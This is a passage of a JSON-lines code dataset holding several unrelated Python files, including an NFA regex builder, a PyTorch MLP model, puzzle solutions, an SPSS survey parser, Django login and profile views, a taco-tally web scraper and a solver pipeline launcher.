\"\\\\\")\n if len(value) > 1 and not is_meta_character:\n raise Exception(\"Can't compare a char with 2 or more chars.\")\n elif value == c:\n return True\n else:\n return False\n\n elif isinstance(value, tuple):\n return char_pattern_list_match(value, c)\n\n else:\n raise Exception(\"The argument called with match_value is not available.\") \n\nprint(value_match((\"SET\", (\"RANGE\", \"a\", \"g\")), \"k\"))\n\ndef transit_string_in_graph(graph_dict, start_point, string):\n status = start_point\n for c in string:\n for value in graph_dict[status]:\n if value_match(value, c):\n status = graph_dict[status][value]\n \n return status\n\nprint(transit_string_in_graph(graph_dict, start_point, string2))\n\n\ndef id_gen():\n id_num = 0\n while True:\n new_value = (yield id_num)\n if new_value != None:\n id_num = new_value\n else:\n id_num += 1\n\nreal_id_generator = id_gen()\n\nclass NFA():\n '''Definition of NFA graph'''\n def __init__(self):\n self.start = None\n self.end = []\n self.graph = [] # list of triary tuple\n \n def __repr__(self):\n return_string = \"\"\n return_string += \"Start: %d\\n\" % self.start\n \n if self.graph == []:\n return_string += \"EMPTY PATH\"\n\n else:\n for path in self.graph:\n path_string = \"%s -> %s : %s\\n\" % (path[0], path[1], path[2])\n return_string += path_string\n \n end_string = \"End: \" + str(self.end)\n return_string += end_string\n \n return return_string\n \ndef make_simple_nfa(pattern):\n nfa = NFA()\n nfa.start = next(real_id_generator)\n nfa.end.append(next(real_id_generator))\n\n nfa.graph.append(tuple([nfa.start, nfa.end[0], pattern]))\n\n return nfa\n\ndef nfa_concat(nfa1, nfa2):\n \"\"\"xy\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n\n connecting_point_pair = [nfa1.end, nfa2.start]\n \n new_graph = copy(nfa1.graph)\n new_end = []\n for path in nfa2.graph:\n if path[0] == connecting_point_pair[1]:\n for n in connecting_point_pair[0]:\n new_graph.append(tuple([n] + list(path[1:3])))\n else:\n new_graph.append(path)\n \n for e in nfa2.end:\n if e == connecting_point_pair[1]:\n new_end += nfa1.end\n else:\n new_end.append(e)\n \n new_nfa.graph = new_graph\n new_nfa.end = new_end\n\n return new_nfa\n\ndef nfa_or(nfa1, nfa2):\n \"\"\"x|y\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n\n new_end = copy(nfa1.end)\n \n new_graph = copy(nfa1.graph)\n\n for path in nfa2.graph:\n if path[0] == nfa2.start:\n appended_link = tuple([nfa1.start] + list(path[1:3]))\n new_graph.append(appended_link)\n else:\n new_graph.append(path)\n \n for e in nfa2.end:\n if e == nfa2.start:\n new_end.append(nfa1.start)\n else:\n new_end.append(e)\n \n new_nfa.graph = new_graph\n new_nfa.end = new_end\n\n return new_nfa\n\ndef nfa_once_or_none(nfa1, nfa2):\n \"\"\"\"xy?\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n new_nfa.end = nfa1.end + nfa2.end\n\n new_graph = copy(nfa1.graph)\n for path in nfa2.graph:\n generated_links = []\n\n if path[0] == nfa2.start:\n for new_link_orig in nfa1.end:\n appended_link = tuple([new_link_orig] + list(path[1:]))\n generated_links.append(appended_link)\n else:\n generated_links = [path]\n\n new_graph += generated_links\n new_nfa.graph = new_graph\n\n return new_nfa\n\n\ndef nfa_repeat_or_none(nfa1, nfa2):\n \"\"\"xy*\"\"\"\n new_nfa = NFA()\n new_nfa.start = copy(nfa1.start)\n new_nfa.end = copy(nfa1.end)\n\n new_graph = copy(nfa1.graph)\n\n for path in nfa2.graph:\n temp_links = []\n\n if path[0] == nfa2.start:\n for new_link_orig in nfa1.end:\n appended_link = tuple([new_link_orig] + list(path[1:]))\n temp_links.append(appended_link)\n else:\n temp_links = [path]\n \n generated_new_links = []\n for link in temp_links:\n if link[1] in nfa2.end:\n for new_link_end in nfa1.end:\n appended_link = tuple([link[0]]+[new_link_end]+[link[2]])\n generated_new_links.append(appended_link)\n else:\n generated_new_links.append(link)\n\n new_graph += generated_new_links\n new_nfa.graph = new_graph\n \n return new_nfa\n\nnfa1 = make_simple_nfa(\"a\")\nnfa2 = make_simple_nfa((\"NOT\", \"b\"))\nnfa3 = nfa_or(nfa1, nfa2)\nprint(nfa3)\nprint(nfa_repeat_or_none(nfa1, nfa2))\nprint(nfa_once_or_none(nfa1, nfa2))","sub_path":"newFolder/nfa_graph.py","file_name":"nfa_graph.py","file_ext":"py","file_size_in_byte":7495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222011587","text":"from importlib import reload\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.cluster.birch import Birch\nfrom sklearn.metrics import silhouette_score, davies_bouldin_score\nimport attributes as at\nimport plot_helper as ph\nimport pandas as pd\nimport os\n\n#\n# Subset of Attributes\n# \nattributes = at.attributes\ncolumns = [a['col'] for a in attributes]\nnames = [a['name'] for a in attributes]\n\nbase_path = '.'\ndf = pd.read_csv(f'{base_path}/data/deepsolar_tract.csv', index_col=0)\ndf = df[columns]\n\n#\n# NaN Count\n#\nnan_count = df.isnull().any(axis=1).sum()\nprint(nan_count)\nprint(len(df))\ndf.dropna(inplace=True)\nprint(len(df))\n\n#\n# Group By FIPS\n#\ndf = df.groupby(['state', 'fips']).mean().reset_index()\n\n#\n# Maps\n#\nmap_attributes = list(filter(lambda a: a['col'] in ['solar_system_count', 'total_panel_area', 'frost_days'], attributes))\nfor ma in map_attributes:\n col = ma['col']\n name = ma['name']\n map_df = df[['state', col]].groupby(['state']).sum().reset_index()\n locations = list(map(str.upper, map_df['state']))\n z = map_df[col]\n\n ph.plot_us_map(\n locations,\n z,\n 'viridis',\n name,\n name + ' by State',\n '/maps/' + col + '_by_state'\n )\n\n# map_df = df[['fips', col]].groupby(['fips']).sum().reset_index()\n# fips = [int(str(f)[:-6]) for f in map_df['fips']]\n# values = map_df[col]\n\n# ph.plot_fips(\n# fips,\n# values,\n# name,\n# name + ' by State',\n# '/maps/' + col + '_by_fips'\n# )\n\n#\n# Histograms\n#\nhist_attributes = list(filter(lambda a: a['col'] not in ['state', 'fips'], attributes))\nfor ha in hist_attributes:\n col = ha['col']\n name = ha['name']\n\n ph.plot_hist(\n df[[col]],\n 50,\n col,\n dict([(col, name)]),\n '/hist/' + col\n )\n\n#\n# Box Plots\n#\nbox_plots_attributes = list(filter(lambda a: a['col'] not in ['state', 'fips'], attributes))\nfor bp in box_plots_attributes:\n col = bp['col']\n name = bp['name']\n ph.plot_box_plot(df[col], col, dict([(col, name)]), './box/' + col)\n\ndf.to_csv('data/data_to_cluster.csv')","sub_path":"data-analysis/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"513129261","text":"\"\"\"\nSimilar to PointNet, just mlp without dropout.\n\"\"\"\nimport torch.nn as nn\nimport torch.utils.data\nimport torch.nn.functional as F\nimport torch\nimport torch.nn.parallel\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport numpy as np\n\n__all__ = [\"MLP5_max\", \"MLP5_avg\"]\n\nclass MLP5(nn.Module):\n def __init__(self, num_classes=40, use_normals=True, pool='max', **kwargs):\n super(MLP5, self).__init__()\n if use_normals:\n channel = 6\n else:\n channel = 3\n self.feat = nn.Sequential(\n nn.Conv1d(channel, 64,1),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.Conv1d(64, 128,1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 1024,1),\n nn.BatchNorm1d(1024)\n )\n self.pool = nn.AdaptiveMaxPool1d(1) if pool == \"max\" else nn.AdaptiveAvgPool1d(1)\n self.fc1 = nn.Linear(1024, 512)\n self.fc2 = nn.Linear(512, 256)\n self.fc3 = nn.Linear(256, num_classes)\n # self.dropout = nn.Dropout(p=0.4)\n self.bn1 = nn.BatchNorm1d(512)\n self.bn2 = nn.BatchNorm1d(256)\n\n\n def forward(self, x):\n x = self.feat(x)\n x = self.pool(x).squeeze(dim=-1)\n x = F.relu(self.bn1(self.fc1(x)), inplace=True)\n x = F.relu(self.bn2(self.fc2(x)), inplace=True)\n x = self.fc3(x)\n return {\n \"logits\":x\n }\n\n\ndef MLP5_max(num_classes=40, **kwargs) -> MLP5:\n return MLP5(num_classes=num_classes, pool=\"max\", **kwargs)\n\ndef MLP5_avg(num_classes=40, **kwargs) -> MLP5:\n return MLP5(num_classes=num_classes, pool=\"avg\", **kwargs)\n\n\nif __name__ == '__main__':\n print(\"===> testing pointNet with use_normals\")\n data = torch.rand(10, 6, 1024)\n model = MLP5_avg(k=40, use_normals=True)\n out = model(data)\n print(f\"x shape is: {out['logits'].shape}\")\n","sub_path":"models/mlp5.py","file_name":"mlp5.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"211550426","text":"#1436번: 영화감독 숌\n#https://www.acmicpc.net/problem/1436\n\ncnt = int(input())\n\nnum = 666\nck = 1\n\nwhile True:\n\n if ck == cnt:\n print(num)\n break\n \n num += 1\n\n if str(num).find(\"666\") != -1:\n ck +=1\n\n\n\n\n \n","sub_path":"11_브루트포스/[05]1436번_영화감독숌.py","file_name":"[05]1436번_영화감독숌.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35762359","text":"import os\nimport subprocess as sub\nimport re\n\ncurdir=os.getcwd()\ncurdir=curdir.strip('automatic')\nnewdir=curdir+'inputdata'\nos.chdir(newdir)#enter data directory\nwith open('input.txt','r') as f:\n count=len(f.readlines())\n f.seek(0)\n for i in range(1,count+1):\n line=f.readline()\n find_1=bool(re.match('[\\s]*casetype',line))\n find_2=bool(re.match('[\\s]*num_p_pre',line))\n find_3=bool(re.match('[\\s]*num_p_solve',line))\n find_4=bool(re.match('[\\s]*inputpath',line))\n find_5=bool(re.match('[\\s]*meshtype',line))\n find_6=bool(re.match('[\\s]*internalfield',line))\n find_7=bool(re.match('[\\s]*mediumtype',line))\n find_8=bool(re.match('[\\s]*quadtype',line))\n find_9=bool(re.match('[\\s]*spacescheme',line))\n find_10=bool(re.match('[\\s]*wall_temperature',line))\n find_11=bool(re.match('[\\s]*wall_emissivity',line))\n find_12=bool(re.match('[\\s]*num_p_dir',line))\n find_13=bool(re.match('[\\s]*n_axis',line))\n if find_1 == True:\n casetype=line.lstrip()\n casetype=casetype.replace('casetype = ','')\n casetype=casetype.rstrip()\n if find_2 == True:\n num_pre=line.lstrip()\n num_pre=num_pre.replace('num_p_pre = ','')\n num_pre=num_pre.rstrip()\n if find_3 == True:\n num_solve=line.lstrip()\n num_solve=num_solve.replace('num_p_solve = ','')\n num_solve=num_solve.rstrip()\n if find_4 == True:\n inputpath=line.lstrip()\n inputpath=inputpath.replace('inputpath = ','')\n inputpath=inputpath.rstrip()\n if find_5 == True:\n meshtype=line.lstrip()\n meshtype=meshtype.replace('meshtype = ','')\n meshtype=meshtype.rstrip()\n if find_6 == True:\n internalfield=line.lstrip()\n internalfield=internalfield.replace('internalfield = ','')\n internalfield=internalfield.rstrip()\n if find_7 == True:\n mediumtype=line.lstrip()\n mediumtype=mediumtype.replace('mediumtype = ','')\n mediumtype=mediumtype.rstrip()\n if find_8 == True:\n quadtype=line.lstrip()\n quadtype=quadtype.replace('quadtype = ','')\n quadtype=quadtype.rstrip()\n if find_9 == True:\n spacescheme=line.lstrip()\n spacescheme=spacescheme.replace('spacescheme = ','')\n spacescheme=spacescheme.rstrip()\n if find_10 == True:\n wall_temperature=line.lstrip()\n wall_temperature=wall_temperature.replace('wall_temperature = ','')\n wall_temperature=wall_temperature.rstrip()\n if find_11 == True:\n wall_emissivity=line.lstrip()\n wall_emissivity=wall_emissivity.replace('wall_emissivity = ','')\n wall_emissivity=wall_emissivity.rstrip()\n if find_12 == True:\n num_p_dir=line.lstrip()\n num_p_dir=num_p_dir.replace('num_p_dir = ','')\n num_p_dir=num_p_dir.rstrip()\n if find_13 == True:\n n_axis=line.lstrip()\n n_axis=n_axis.replace('n_axis = ','')\n n_axis=n_axis.rstrip()\n\nwith open('input_2.txt','w') as c:\n print('#inputpath',file=c)\n print(inputpath,file=c)\n print('#meshtype',file=c)\n print(meshtype,file=c)\n print('#casetype',file=c)\n print(casetype,file=c)\n print('#internalfield',file=c)\n print(internalfield,file=c)\n print('#mediumtype',file=c)\n print(mediumtype,file=c)\n print('#quadtype',file=c)\n print(quadtype,file=c)\n print('#spacescheme',file=c)\n print(spacescheme,file=c)\n print('#wall_temperature',file=c)\n print(wall_temperature,file=c)\n print('#wall_emissivity',file=c)\n print(wall_emissivity,file=c)\n print('#num_p_dir',file=c)\n print(num_p_dir,file=c)\n print('#n_axis',file=c)\n print(n_axis,file=c)\n\nif casetype == 'benchmark':#if the case is a benchmark,just trim the primitive .msh file\n newdir=curdir+'convert_msh'\n os.chdir(newdir)#change directory to convert_msh\n job=sub.call('./launch',shell=True)\nelif casetype == 'real':#if the case is a real case with .dat file, convert it to the modified .msh file\n newdir=curdir+'dat_2_msh'\n os.chdir(newdir)#change directory to new_pre\n job=sub.call('./launch',shell=True)\n\nnewdir=curdir+'preprocessing'\nos.chdir(newdir)#enter preprocessing directory\njob=sub.call('./launch',shell=True)\njob=sub.call('./pre',shell=True)\nnewdir=curdir+'solver'\nos.chdir(newdir)#enter solver directory\njob=sub.call('./launch',shell=True)\njob=sub.call('mpirun -np '+num_solve+ ' ./solve',shell=True)\nnewdir=curdir+'postprocessing'#enter postprocessing directory\nos.chdir(newdir)\njob=sub.call('./launch',shell=True)","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"500458064","text":"alph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\nT = int(input())\nfor tc in range(1, T+1):\n\tN, L = [int(a) for a in input().split()]\n\tc = [int(a) for a in input().split()]\n\tpp3 = [c[n]*c[n+2]/c[n+1] for n in range(L-2)]\n\tminn, minpp3 = min(enumerate(pp3), key=lambda x: x[1])\n\tp = [None]*(L+1)\n\ti=2\n\twhile i*i <= minpp3:\n\t\tif(minpp3%i == 0):\n\t\t\tpf1 = i\n\t\t\tpf2 = int(minpp3//i)\n\t\t\tbreak\n\t\ti+=1\n\ttry:\n\t\tp[minn+3] = pf1\n\t\tp[minn] = pf2\n\t\tfor i in range(minn, 0, -1):\n\t\t\tif c[i-1]/p[i] != c[i-1]//p[i]: raise \"\"\n\t\t\tp[i-1] = c[i-1]//p[i]\n\t\tfor i in range(minn, len(p)-1):\n\t\t\tif c[i]/p[i] != c[i]//p[i]: raise \"\"\n\t\t\tp[i+1] = c[i]//p[i]\n\t\tsp = sorted(set(p))\n\t\tk = dict(zip(sp, alph))\n\t\tprint(\"Case #{}: {}\".format(tc, ''.join([k[a] for a in p])))\n\texcept:\n\t\tp[minn+3] = pf2\n\t\tp[minn] = pf1\n\t\tfor i in range(minn, 0, -1):\n\t\t\tp[i-1] = c[i-1]//p[i]\n\t\tfor i in range(minn, len(p)-1):\n\t\t\tp[i+1] = c[i]//p[i]\n\t\tsp = sorted(set(p))\n\t\tk = dict(zip(sp, alph))\n\t\tprint(\"Case #{}: {}\".format(tc, ''.join([k[a] for a in p])))","sub_path":"code jam 2019/qualification_round/cryptopangrams.py","file_name":"cryptopangrams.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"292151768","text":"import pandas as pd\nimport logging\nfrom collections import OrderedDict\n\nimport rpy2\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.packages import importr\nimport pandas.rpy.common as com\n\nfrom survey_stats import helpr\n\nrbase = importr('base')\n\n\ndef strip_line(l):\n # type: (str) -> str\n # strip whitespace and trailing period\n # and remove double quotes\n return l.strip().strip('.').replace('\"','').replace(\"'\",\"\")\n\n\nclass ParseSPSSException(Exception):\n pass\n\nclass ParseCDCSurveyException(Exception):\n pass\n\n\ndef parse_fwfcols_spss(spss_file):\n # type: (str) -> OrderedDict\n \"\"\"Extracts dat metadata from CDC YRBS SPSS files\n\n Extracts the col_specs from a CDC YRBS SPSS file. The col_specs\n are given as 3-tuples of (var, start, end) for each column in\n the fixed-width dat file.\n\n Args:\n spss_file: SPSS file path or file object\n\n Returns:\n colspecs: an `OrderedDict` colnames as keys, (st,en) as vals\n \"\"\"\n\n def parse_field_span(span):\n \"\"\" parse start and end \"\"\"\n try:\n (st, en) = span.split('-')\n ret = (int(st)-1,int(en))\n except Exception as e:\n raise ParseSPSSException(\"Improperly formed span in SPSS\" +\n \"file! %s -> %s\" % (span, str(e)))\n return ret\n\n # if arg is filename, call self with open fh\n if not getattr(spss_file, 'read', False):\n with open(spss_file, 'r') as fh:\n return parse_fwfcols_spss(fh)\n\n col_specs = OrderedDict()\n widths_flag = False\n # extract fixed-width-field length rows\n for line in spss_file:\n if line.startswith('DATA LIST FILE'):\n widths_flag = True\n continue\n elif widths_flag and line.startswith('EXECUTE'):\n widths_flag = False\n break\n elif widths_flag:\n #parse a line with field widths\n #split on two consec spaces\n widths = strip_line(line).replace('(A)','').split()\n if not len(widths) % 2 == 0:\n raise ParseSPSSException(\"Invalid fixed-width field\" +\n \" definitions on line: %s\" %\n strip_line(line))\n for i in range(0,len(widths),2):\n #iterate through pairs of var, span, and parse\n var = widths[i].lower()\n col_specs[var] = parse_field_span(widths[i+1])\n continue\n else:\n continue\n # - end for line in readline()...\n return col_specs\n\n\ndef parse_surveyvars_spss(spss_file):\n \"\"\"Extracts dat metadata from CDC YRBS SPSS files\n\n Extracts the survey questions and responses from the\n CDC YRBS SPSS file.\n\n Args:\n spss_file: SPSS file path\n\n Returns:\n survey_vars: an OrderedDict with survey variables\n\n The resulting `survey_vars` is an OrderedDict with\n variable names as keys and dict values with fields of\n `question` containing the survey question, and `responses`\n containing a list of tuples of the form (resp_num, resp_label)\n \"\"\"\n # if arg is filename, call self with open fh\n if not getattr(spss_file, 'read', False):\n with open(spss_file, 'r') as fh:\n return parse_surveyvars_spss(fh)\n\n survey_vars = OrderedDict()\n vars_flag = False\n vals_flag = False\n var = None\n vals = []\n # extract fixed-width-field length rows\n for line in spss_file:\n if line.startswith('VARIABLE LABELS'):\n vars_flag = True\n continue\n elif vars_flag and strip_line(line) == '':\n vars_flag = False\n continue\n elif vars_flag:\n #parse variable label\n # and add tuple (var, question/label)\n (var, q) = strip_line(line).split(' ', 1)\n var = var.lower()\n survey_vars[var] = {\n 'question': q,\n 'responses': [],\n 'is_integer': False\n }\n elif line.startswith('VALUE LABELS'):\n vals_flag = True\n vars_flag = False\n vals = []\n var = None\n continue\n elif vals_flag and line.startswith('/.'):\n #save the last var and val lbls\n #reset vals_flag\n survey_vars[var]['responses'] = vals[:]\n survey_vars[var]['is_integer'] = all(x[0].isdigit() for x in vals)\n var = None\n vals = []\n vals_flag = False\n continue\n elif vals_flag and line.strip() == '/':\n # save the last var and val lbls\n # reset\n survey_vars[var]['responses'] = vals[:]\n survey_vars[var]['is_integer'] = all(x[0].isdigit() for x in vals)\n var = None\n vals = []\n continue\n elif vals_flag and not var:\n # set the current var\n var = strip_line(line).lower()\n continue\n elif vals_flag and var:\n #add (num, label) to current list of val labels\n vals.append(tuple(\n strip_line(line).split(' ', 1) ))\n continue\n else:\n #default\n continue\n # - end for line in fh.readline()...\n return survey_vars\n\n\nclass ParseCDCSurveyException(Exception):\n pass\n\ndef load_survey(dat_files, svy_cols, svy_vars):\n logging.info('parsing raw survey data: %s' % ','.join(dat_files))\n df = pd.concat(map(lambda dat_f: pd.read_fwf(dat_f,\n colspecs=list(svy_cols.values()),\n names=list(svy_cols.keys()),\n na_values=['.','']),\n dat_files), ignore_index=True, copy=False)\n logging.info('converting survey data to R object')\n rdf = com.convert_to_r_dataframe(df)\n logging.info('coercing variables to annotated types')\n for q, v in svy_vars.items():\n if v['is_integer']:\n (codes, cats) = zip(*v['responses'])\n idx = rdf.colnames.index(q)\n fac = rdf[idx]\n try:\n fac = rbase.as_integer(fac)\n fac = rbase.factor(fac, levels=list(codes), labels=list(cats))\n rdf[idx] = fac\n except:\n logging.error(rbase.summary(rdf[idx]))\n logging.error(helpr.factor_summary(rdf[idx]))\n logging.error(rbase.summary(fac))\n bt.send_last_exception()\n raise ParseCDCSurveyException('parsing problems: %s -> %s'\n % (q, v))\n elif q.startswith('qn'):\n idx = rdf.colnames.index(q)\n fac = rbase.as_integer(rdf[idx])\n coerced = rbase.is_na(fac)\n n_coerced = rbase.sum(coerced)[0]\n if n_coerced > 0:\n coerced = helpr.factor_summary(rdf[idx].rx(coerced))\n logging.warning('Coerced non-numeric values for variable:' +\n ' %s\\n%s' % (q, coerced))\n if rbase.min(fac, na_rm=True)[0] < 1 or \\\n rbase.max(fac, na_rm=True)[0] > 2:\n raise ParseCDCSurveyException('Found invalid levels for' +\n ' boolean var: %s -> %s' %\n (q, helpr.factor_summary(fac)))\n rdf[idx] = helpr.tobool(fac)\n return rdf\n\n'''\ndef load_survey_py(dat_file, svy_cols, svy_vars):\n df = pd.read_fwf(dat_file, colspecs=list(svy_cols.values()),\n names=list(svy_cols.keys()), na_values=['.',''])\n logging.info('Parsed raw survey data')\n for q, v in svy_vars.items():\n if v['is_integer']:\n (codes, cats) = zip(*v['responses'])\n try:\n df[q] = pd.Categorical.from_codes(df[q].fillna(-1),\n categories=list(cats),\n ordered=True)\n except:\n logging.error(df[q].describe())\n raise ParseCDCSurveyException('parsing problems: %s -> %s'\n % (q, v))\n elif q.startswith(BOOLEAN_RESPONSE_PREFIX):\n idx = rdf.colnames.index(q)\n fac = rbase.as_integer(rdf[idx])\n coerced = rbase.is_na(fac)\n n_coerced = rbase.sum(coerced)[0]\n if n_coerced > 0:\n coerced = helpr.factor_summary(rdf[idx].rx(coerced))\n logging.warning('Coerced non-numeric values for variable:' +\n ' %s\\n%s' % (q, coerced))\n if rbase.min(fac, na_rm=True)[0] < 1 or \\\n rbase.max(fac, na_rm=True)[0] > 2:\n raise ParseCDCSurveyException('Found invalid levels for' +\n ' boolean var: %s -> %s' %\n (q, helpr.factor_summary(fac)))\n rdf[idx] = tobool(fac)\n rdf = com.convert_to_r_dataframe(df)\n logging.info('Converted survey data to R object')\n return rdf\n'''\n","sub_path":"src/survey_stats/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393009174","text":"import datetime\nfrom urllib.parse import urlparse\n\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib import messages\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.contrib.auth import REDIRECT_FIELD_NAME, login as auth_login\nfrom django.contrib.sites.models import get_current_site\nfrom django.conf import settings\n\nfrom utils.views import LoginRequiredMixin\n\nfrom ..user_log.helpers import user_log\nfrom ..reg_edoc.models import EDoc\n\nfrom .forms import ProfileUpdateForm, YPAuthenticationForm\nfrom .models import YPUser\n\n\nclass ProfileUpdateView(LoginRequiredMixin, UpdateView):\n template_name = 'accounts/profile_form.html'\n form_class = ProfileUpdateForm\n model = YPUser\n\n def get_success_url(self):\n user_log(self.request.user, 'Пользовательские данные обновленны.')\n messages.success(self.request, 'Профиль отредактирован')\n return reverse('profile')\n\n def get_object(self):\n return self.request.user\n\n\nclass ProfileDetailView(LoginRequiredMixin, DetailView):\n template_name = 'accounts/profile_detail.html'\n model = YPUser\n context_object_name = 'profile'\n\n def get_object(self):\n return self.request.user\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['latest_uploaded_edocs'] = EDoc.objects.filter(\n user=self.get_object()).order_by('-modified')[:3]\n context['private'] = True\n return context\n\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request, template_name='registration/login.html',\n redirect_field_name=REDIRECT_FIELD_NAME,\n authentication_form=YPAuthenticationForm,\n current_app=None, extra_context=None):\n \"\"\"\n Displays the login form and handles the login action.\n\n \"\"\"\n redirect_to = request.REQUEST.get(redirect_field_name, '')\n\n if request.method == \"POST\":\n form = authentication_form(data=request.POST)\n if form.is_valid():\n netloc = urlparse(redirect_to)[1]\n # Use default setting if redirect_to is empty\n if not redirect_to:\n redirect_to = settings.LOGIN_REDIRECT_URL\n\n # Heavier security check -- don't allow redirection to a different\n # host.\n elif netloc and netloc != request.get_host():\n redirect_to = settings.LOGIN_REDIRECT_URL\n\n # Okay, security checks complete. Log the user in.\n auth_login(request, form.get_user())\n\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n # Set domain cookie\n response = HttpResponseRedirect(redirect_to)\n max_age = 365 * 24 * 60 * 60\n expires = datetime.datetime.strftime(\n datetime.datetime.utcnow() + datetime.timedelta(\n seconds=max_age),\n '%a, %d-%b-%Y %H:%M:%S GMT')\n response.set_cookie('unified_domain',\n form.cleaned_data.get('domain'),\n max_age=max_age,\n expires=expires)\n\n # удаляем cookie поиска, филтра по тематикам и сортировки\n response.delete_cookie('user_gallery_search_query')\n response.delete_cookie('user_gallery_filter_by_subject')\n response.delete_cookie('user_gallery_sort_by')\n response.delete_cookie('user_gallery_sort_by_popularity')\n response.delete_cookie('user_gallery_sort_by_num-edocs')\n response.delete_cookie('user_gallery_sort_by_date')\n\n return response\n else:\n form = authentication_form(request)\n\n request.session.set_test_cookie()\n\n current_site = get_current_site(request)\n\n context = {\n 'form': form,\n redirect_field_name: redirect_to,\n 'site': current_site,\n 'site_name': current_site.name,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template_name, context, current_app=current_app)\n","sub_path":"apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185895576","text":"from secrets import (cookie, urls, single_url)\nfrom writer import (main,)\nfrom utils import (clean_message_string,)\nfrom uuid import uuid4\nfrom bs4 import BeautifulSoup\nimport requests\n\nrows = []\n\ndef guac():\n taco_id = 1\n for url in single_url:\n r = requests.get(url, cookies=cookie)\n data = r.text\n soup = BeautifulSoup(data, 'html.parser')\n tacos = soup.findAll('li', attrs={'class': 'item'})\n for taco in tacos:\n # Capture HTML for .who div\n who_div = taco.find('div', attrs={'class': 'who'})\n\n # Capture elements containing giver/receiver data\n who_elements = who_div.findAll('a', attrs={'class': 'view-profile'})\n\n # Capture/clean giver/reciever handles\n recipient = str(who_elements[0]['data-name'])\n sender = str(who_elements[1]['title'].split(' ')[0])\n\n # Capture HTML for .message div\n message_div = taco.find('div', attrs={'class': 'message'})\n message_id = str(uuid4())\n\n # Capture and clean message content\n # message = str(message_div.text).strip('\\n').replace(' ', '')\n try:\n message = clean_message_string(str(message_div.text))\n except:\n message = 'Message not available'\n\n hashtags = []\n for word in message.split(' '):\n if '#' in word:\n hashtags.append(word)\n\n taco_tally = []\n\n try:\n for c in message_div.contents:\n try:\n if str(c['title']) == 'taco':\n taco_tally.append('taco')\n except:\n continue\n except:\n pass\n\n current = (taco_id, message_id, sender, str(recipient), message,)\n if hashtags:\n for tag in hashtags:\n current = (taco_id, message_id, sender, str(recipient), message,)\n current += (tag,)\n current += (len(taco_tally),)\n rows.append(current)\n taco_id += 1\n else:\n current += ('None',)\n current += (len(taco_tally),)\n rows.append(current)\n taco_id += 1\n\n\nif __name__ == '__main__':\n guac()\n main(rows)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"641613813","text":"# PySide imports\nfrom PySide import QtGui\n\n# hfx2 imports\nfrom SimpleInputs import StringWidget\n\n\nclass SearchBar(StringWidget):\n \"\"\"\n Search bar for the hfx framework.\n \"\"\"\n\n def __init__(self, parent, icon=None):\n super(SearchBar, self).__init__(parent, name='Search', icon=icon)\n\n # current focus\n self._focus = None\n\n # bindings\n self.returnPressed.connect(self.searchFor)\n QtGui.qApp.focusChanged.connect(self.focusTrack)\n\n def _display(self):\n \"\"\"\n private\n :return:\n \"\"\"\n if self._focus:\n self.setPlaceholderText('Search %s' % self._focus.__class__.__name__)\n else:\n self.setPlaceholderText('Search Widgets (%s)' % str(len(self.searchableWidgets())))\n\n def focusTrack(self, old, new):\n self._focus = None\n\n for topLevel in QtGui.qApp.topLevelWidgets():\n for child in topLevel.children():\n if isinstance(child, SearchBar):\n continue\n try:\n if child.isAncestorOf(new):\n self._focus = child\n self._display()\n return\n except (TypeError, AttributeError):\n pass\n self._display()\n\n def searchableWidgets(self):\n \"\"\"\n Get a list of searchable widgets.\n :return:\n \"\"\"\n validWidgets = []\n\n # loop over children\n for child in self.parent().children():\n if not hasattr(child, 'search') or isinstance(child, SearchBar):\n continue\n validWidgets.append(child)\n\n return validWidgets\n\n def searchFor(self, value=None):\n \"\"\"\n Search for a value.\n :param value:\n :return:\n \"\"\"\n if not value:\n value = self.text()\n\n if self._focus:\n if hasattr(self._focus, 'search'):\n self._focus.search(value)\n else:\n for widget in self.searchableWidgets():\n widget.search(value)","sub_path":"hfx2/gui/widgets/Searching.py","file_name":"Searching.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"567152908","text":"import re\nimport sys\ndef 